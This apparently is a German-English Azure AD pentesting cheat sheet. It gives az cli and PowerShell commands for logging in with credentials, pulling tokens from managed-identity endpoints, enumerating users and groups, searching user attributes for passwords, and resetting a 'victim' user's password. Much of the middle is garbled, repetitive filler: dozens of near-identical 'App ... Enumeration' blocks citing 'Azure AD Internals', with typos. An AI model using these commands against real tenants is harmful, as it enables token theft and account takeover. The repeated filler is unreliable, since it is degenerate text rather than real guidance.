Az - AzureAD (AAD)

Grundlegende Informationen

Azure Active Directory (Azure AD) dient als cloudbasierter Dienst von Microsoft für Identitäts- und Zugriffsverwaltung. Es ist entscheidend, um Mitarbeitern das Anmelden und den Zugriff auf Ressourcen zu ermöglichen, sowohl innerhalb als auch außerhalb der Organisation, einschließlich Microsoft 365, des Azure-Portals und einer Vielzahl anderer SaaS-Anwendungen. Das Design von Azure AD konzentriert sich darauf, wesentliche Identitätsdienste bereitzustellen, insbesondere Authentifizierung, Autorisierung und Benutzerverwaltung.

Zu den wichtigsten Funktionen von Azure AD gehören Mehr-Faktor-Authentifizierung und bedingter Zugriff, zusammen mit einer nahtlosen Integration mit anderen Microsoft-Sicherheitsdiensten. Diese Funktionen erhöhen die Sicherheit von Benutzeridentitäten erheblich und ermöglichen es Organisationen, ihre Zugriffsrichtlinien effektiv umzusetzen und durchzusetzen. Als grundlegender Bestandteil des cloudbasierten Diensteökosystems von Microsoft ist Azure AD entscheidend für das cloudbasierte Management von Benutzeridentitäten.

Entitäten

Enumeration

Für diese Enumeration können Sie das az cli tool, das PowerShell-Modul AzureAD (oder AzureAD Preview) und das Az PowerShell-Modul verwenden.

sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Modulunterschiede

• AzureAD ist ein PowerShell-Modul von Microsoft zur Verwaltung von Azure AD. Es zeigt nicht alle Eigenschaften von Azure AD-Objekten an und kann nicht verwendet werden, um Informationen zu Azure-Ressourcen abzurufen.

• Az PowerShell ist ein Modul zur Verwaltung von Azure-Ressourcen von der PowerShell-Befehlszeile.

Verbindung

az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples

Connect-AzureAD #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds

# Using tokens
## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token

Connect-AzAccount #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@corp.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds

# Get Access Token
(Get-AzAccessToken).Token
# Request access token to other endpoints: AadGraph, AnalysisServices, Arm, Attestation, Batch, DataLake, KeyVault, MSGraph, OperationalInsights, ResourceManager, Storage, Synapse
Get-AzAccessToken -ResourceTypeName MSGraph
(Get-AzAccessToken -Resource "https://graph.microsoft.com").Token

# Conenct with access token
Connect-AzAccount -AccountId test@corp.onmicrosoft.com -AccessToken $token
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
## The -AccessToken is from management.azure.com

# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 29sd87e56-a192-a934-bca3-0398471ab4e7d

#All the Azure AD cmdlets have the format *-AzAD*
Get-Command *azad*
#Cmdlets for other Azure resources have the format *Az*
Get-Command *az*

#Using management
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# Using graph
Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}

# Request tokens to access endpoints
# ARM
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

Wenn Sie sich über die CLI bei Azure mit einem beliebigen Programm anmelden, verwenden Sie eine Azure-Anwendung aus einem Mandanten, der zu Microsoft gehört. Diese Anwendungen, wie diejenigen, die Sie in Ihrem Konto erstellen können, haben eine Client-ID. Sie können nicht alle von ihnen in den Listen der zugelassenen Anwendungen sehen, die Sie in der Konsole sehen können, aber sie sind standardmäßig zugelassen.

Zum Beispiel verwendet ein PowerShell-Skript, das sich authentifiziert, eine App mit der Client-ID 1950a258-227b-4e31-a9cf-717495945fc2. Selbst wenn die App nicht in der Konsole angezeigt wird, könnte ein Systemadministrator diese Anwendung blockieren, sodass Benutzer nicht über Tools darauf zugreifen können, die über diese App eine Verbindung herstellen.

Es gibt jedoch andere Client-IDs von Anwendungen, die es Ihnen ermöglichen, eine Verbindung zu Azure herzustellen:

# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

Benutzer

# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>

# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the begining of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }

# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginnig of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com

Passwort des Benutzers ändern

$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose

MFA & Bedingte Zugriffsrichtlinien

Es wird dringend empfohlen, MFA für jeden Benutzer hinzuzufügen. Einige Unternehmen setzen es jedoch möglicherweise nicht oder aktivieren es mit einer bedingten Zugriffsrichtlinie: Der Benutzer wird zur MFA-Eingabe aufgefordert, wenn er sich von einem bestimmten Standort, Browser oder unter bestimmten Bedingungen aus anmeldet. Diese Richtlinien sind anfällig für Umgehungen, wenn sie nicht korrekt konfiguriert sind. Überprüfen Sie:

Gruppen

# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *

Azure AD Enumeration

User Enumeration

User enumeration can be performed through the login interface by identifying different responses for valid and invalid users.

Tools

• Azure AD Internals: A tool that can be used to enumerate users in Azure AD.

Group Enumeration

Group enumeration can be performed by identifying the response when requesting information about a specific group.

Tools

• Azure AD Internals: This tool can also be used to enumerate groups in Azure AD.

Application Enumeration

Application enumeration involves identifying applications registered in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

Device Enumeration

Device enumeration involves identifying devices registered in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating devices registered in Azure AD.

Service Principal Enumeration

Service principal enumeration involves identifying service principals in Azure AD.

Tools

• Azure AD Internals: Thisjson tool can be used to enumerate service principals in Azure AD.

Tenant Enumeration

Tenant enumeration involves identifying the tenant ID and tenant domain in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate tenant information in Azure AD.

Domain Enumeration

Domain enumeration involves identifying the domains associated with the Azure AD tenant.

Tools

• Azure AD Internals: This tool can help enumerate domains associated with the Azure AD tenant.

Policy Enumeration

Policy enumeration involves identifying the policies configured in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating policies configured in Azure AD.

Role Enumeration

Role enumeration involves identifying the roles assigned in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate roles assigned in Azure AD.

Certificate Enumeration

Certificate enumeration involves identifying certificates registered in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate certificates registered in Azure AD.

Key Enumeration

Key enumeration involves identifying keys registered in Azure AD.

Tools

• Azure AD Interntools: This tool can assist in enumerating keys registered in Azure AD.

Application Registration Enumeration

Application registration enumeration involves identifying applications registered in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

OAuth2 Permission Enumeration

OAuth2 permission enumeration involves identifying OAuth2 permissions granted in Azure AD.

Tools

• Azure AD Internals: Thisthis tool can be used to enumerate OAuth2 permissions granted in Azure AD.

App Registration Enumeration

App registration enumeration involves identifying applications registered in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate applications registered in Azure AD.

App Role Enumeration

App role enumeration involves identifying app roles assigned in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate app roles assigned in Azure AD.

App Secret Enumeration

App secret enumeration involves identifying application secrets in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating application secrets in Azure AD.

App Credential Enumeration

App credential enumeration involves identifying application credentials in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate application credentials in Azure AD.

App Permission Enumeration

App permission enumeration involves identifying application permissions in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate application permissions in Azure AD.

App Cert Enumeration

App cert enumeration involves identifying application certificates in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating application certificates in Azure AD.

App Key Enumeration

App key enumeration involves identifying application keys in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate application keys in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying application federations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate application federations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App Oauth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

• Azure AD Internals: Thisthis tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating service principal configurations in Azure AD.

App Tenant Enumeration

App tenant enumeration involves identifying tenant configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate tenant configurations in Azure AD.

App Domain Enumeration

App domain enumeration involves identifying domain configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate domain configurations in Azure AD.

App Policy Enumeration

App policy enumeration involves identifying policy configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating policy configurations in Azure AD.

App Role Enumeration

App role enumeration involves identifying role configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate role configurations in Azure AD.

App Certificate Enumeration

App certificate enumeration involves identifying certificate configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate certificate configurations in Azure AD.

App Key Enumeration

App key enumeration involves identifying key configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating key configurations in Azure AD.

App OAuth2 Permission Enumeration

App OAuth2 permission enumeration involves identifying OAuth2 permission configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OAuth2 permission configurations in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying federation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate federation configurations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App OAuth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating service principal configurations in Azure AD.

App Tenant Enumeration

App tenant enumeration involves identifying tenant configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate tenant configurations in Azure AD.

App Domain Enumeration

App domain enumeration involves identifying domain configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate domain configurations in Azure AD.

App Policy Enumeration

App policy enumeration involves identifying policy configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating policy configurations in Azure AD.

App Role Enumeration

App role enumeration involves identifying role configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate role configurations in Azure AD.

App Certificate Enumeration

App certificate enumeration involves identifying certificate configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate certificate configurations in Azure AD.

App Key Enumeration

App key enumeration involves identifying key configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating key configurations in Azure AD.

App OAuth2 Permission Enumeration

App OAuth2 permission enumeration involves identifying OAuth2 permission configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OAuth2 permission configurations in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying federation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate federation configurations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App OAuth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating service principal configurations in Azure AD.

App Tenant Enumeration

App tenant enumeration involves identifying tenant configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate tenant configurations in Azure AD.

App Domain Enumeration

App domain enumeration involves identifying domain configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate domain configurations in Azure AD.

App Policy Enumeration

App policy enumeration involves identifying policy configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating policy configurations in Azure AD.

App Role Enumeration

App role enumeration involves identifying role configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate role configurations in Azure AD.

App Certificate Enumeration

App certificate enumeration involves identifying certificate configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate certificate configurations in Azure AD.

App Key Enumeration

App key enumeration involves identifying key configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating key configurations in Azure AD.

App OAuth2 Permission Enumeration

App OAuth2 permission enumeration involves identifying OAuth2 permission configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OAuth2 permission configurations in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying federation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate federation configurations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App OAuth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating service principal configurations in Azure AD.

App Tenant Enumeration

App tenant enumeration involves identifying tenant configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate tenant configurations in Azure AD.

App Domain Enumeration

App domain enumeration involves identifying domain configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate domain configurations in Azure AD.

App Policy Enumeration

App policy enumeration involves identifying policy configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating policy configurations in Azure AD.

App Role Enumeration

App role enumeration involves identifying role configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate role configurations in Azure AD.

App Certificate Enumeration

App certificate enumeration involves identifying certificate configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate certificate configurations in Azure AD.

App Key Enumeration

App key enumeration involves identifying key configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating key configurations in Azure AD.

App OAuth2 Permission Enumeration

App OAuth2 permission enumeration involves identifying OAuth2 permission configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OAuth2 permission configurations in Azure AD.

App Federation Enumeration

App federation enumeration involves identifying federation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate federation configurations in Azure AD.

App SAML Enumeration

App SAML enumeration involves identifying SAML configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating SAML configurations in Azure AD.

App OpenID Enumeration

App OpenID enumeration involves identifying OpenID configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate OpenID configurations in Azure AD.

App OAuth2 Enumeration

App OAuth2 enumeration involves identifying OAuth2 configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate OAuth2 configurations in Azure AD.

App Graph Enumeration

App Graph enumeration involves identifying Microsoft Graph configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating Microsoft Graph configurations in Azure AD.

App API Enumeration

App API enumeration involves identifying API configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate API configurations in Azure AD.

App Delegation Enumeration

App delegation enumeration involves identifying delegation configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate delegation configurations in Azure AD.

App User Enumeration

App user enumeration involves identifying user configurations in Azure AD.

Tools

• Azure AD Internals: This tool can assist in enumerating user configurations in Azure AD.

App Group Enumeration

App group enumeration involves identifying group configurations in Azure AD.

Tools

• Azure AD Internals: This tool can help enumerate group configurations in Azure AD.

App Device Enumeration

App device enumeration involves identifying device configurations in Azure AD.

Tools

• Azure AD Internals: This tool can be used to enumerate device configurations in Azure AD.

App Service Principal Enumeration

App service principal enumeration involves identifying service principal configurations in Azure AD.

Tools

# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzADGroup -DisplayName <resource_group_name> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }

Azure AD-Identitäten und -Gruppen

Überblick

Azure AD-Identitäten und -Gruppen sind wichtige Elemente, die in Azure AD verwaltet werden. Identitäten können Benutzer oder Anwendungen darstellen, während Gruppen eine Sammlung von Benutzern oder Anwendungen sind. In diesem Abschnitt werden verschiedene Azure PowerShell-Befehle vorgestellt, die bei der Verwaltung von Identitäten und Gruppen in Azure AD helfen.

Identitäten verwalten

Benutzeridentitäten

Um Benutzeridentitäten mithilfe von Azure PowerShell zu verwalten, können Befehle wie New-AzADUser, Get-AzADUser, Set-AzADUser und Remove-AzADUser verwendet werden.

# Beispiel: Neuen Benutzer erstellen
New-AzADUser -DisplayName "Max Mustermann" -UserPrincipalName "max@beispiel.com" -Password "Passwort123!"

Anwendungsidentitäten

Bei der Verwaltung von Anwendungsidentitäten können Befehle wie New-AzADApplication, Get-AzADApplication, Set-AzADApplication und Remove-AzADApplication hilfreich sein.

# Beispiel: Neue Anwendung erstellen
New-AzADApplication -DisplayName "MeineApp" -IdentifierUris "http://meineapp" -HomePage "http://meineapp.com"

Gruppen verwalten

Benutzergruppen

Für die Verwaltung von Benutzergruppen stehen Befehle wie New-AzADGroup, Get-AzADGroup, Set-AzADGroup und Remove-AzADGroup zur Verfügung.

# Beispiel: Neue Benutzergruppe erstellen
New-AzADGroup -DisplayName "IT-Abteilung" -MailEnabled $true -MailNickName "IT" -SecurityEnabled $true

Anwendungsgruppen

Anwendungsgruppen können mithilfe von Befehlen wie New-AzADGroup, Get-AzADGroup, Set-AzADGroup und Remove-AzADGroup verwaltet werden.

# Beispiel: Neue Anwendungsgruppe erstellen
New-AzADGroup -DisplayName "MeineApp-Gruppe" -MailEnabled $false -SecurityEnabled $true

Weitere Informationen

